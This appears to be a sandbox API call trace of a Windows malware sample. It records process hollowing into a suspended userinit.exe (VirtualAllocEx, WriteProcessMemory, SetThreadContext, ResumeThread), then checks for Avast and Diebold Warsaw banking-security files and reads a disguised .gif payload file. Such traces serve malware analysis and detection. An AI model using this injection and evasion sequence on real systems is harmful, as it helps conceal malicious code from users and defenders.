[0178.254] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.255] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.255] GlobalUnlock (hMem=0x189000c) returned 0
[0178.255] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0178.255] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.256] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.256] GlobalUnlock (hMem=0x189000c) returned 0
[0178.256] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0178.256] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.256] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.256] GlobalUnlock (hMem=0x189000c) returned 0
[0178.256] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0178.256] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.257] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.257] GlobalUnlock (hMem=0x189000c) returned 0
[0178.257] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0178.257] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.258] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.258] GlobalUnlock (hMem=0x189000c) returned 0
[0178.258] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0178.258] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.259] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.259] GlobalUnlock (hMem=0x189000c) returned 0
[0178.259] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0178.259] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.259] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.259] GlobalUnlock (hMem=0x189000c) returned 0
[0178.259] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0178.260] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.260] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.260] GlobalUnlock (hMem=0x189000c) returned 0
[0178.260] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0178.260] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.261] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.261] GlobalUnlock (hMem=0x189000c) returned 0
[0178.261] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0178.261] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.262] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.262] GlobalUnlock (hMem=0x189000c) returned 0
[0178.262] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0178.262] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.262] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.262] GlobalUnlock (hMem=0x189000c) returned 0
[0178.262] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0178.262] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.263] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.263] GlobalUnlock (hMem=0x189000c) returned 0
[0178.263] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0178.263] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.264] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.264] GlobalUnlock (hMem=0x189000c) returned 0
[0178.264] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0178.264] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.265] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.265] GlobalUnlock (hMem=0x189000c) returned 0
[0178.265] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0178.265] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.266] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.266] GlobalUnlock (hMem=0x189000c) returned 0
[0178.266] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0178.266] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.267] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.267] GlobalUnlock (hMem=0x189000c) returned 0
[0178.267] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0178.267] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.268] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.268] GlobalUnlock (hMem=0x189000c) returned 0
[0178.268] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0178.268] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.269] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.269] GlobalUnlock (hMem=0x189000c) returned 0
[0178.269] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0178.269] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.269] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0x12c, hThread=0x130, dwProcessId=0x1c0, dwThreadId=0x414)) returned 1
[0178.319] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0178.319] GetThreadContext (in: hThread=0x130, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x6f2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x6ff88, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0178.364] ReadProcessMemory (in: hProcess=0x12c, lpBaseAddress=0x7ffdf008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0178.364] VirtualAllocEx (hProcess=0x12c, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0178.364] VirtualAlloc (lpAddress=0x1c2c000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1c2c000
[0178.369] WriteProcessMemory (in: hProcess=0x12c, lpBaseAddress=0x400000, lpBuffer=0x1c295f0*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1c295f0*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0178.380] WriteProcessMemory (in: hProcess=0x12c, lpBaseAddress=0x7ffdf008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0178.380] SetThreadContext (hThread=0x130, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x6ff88, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0178.380] ResumeThread (hThread=0x130) returned 0x1
[0178.380] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0178.380] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.380] GlobalUnlock (hMem=0x189000c) returned 0
[0178.380] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0178.380] GlobalUnlock (hMem=0x1890004) returned 0
[0178.387] Sleep (dwMilliseconds=0xe74e)
[0188.395] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0188.395] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0188.395] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0188.395] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0188.395] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138
[0188.395] SetFilePointer (in: hFile=0x138, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
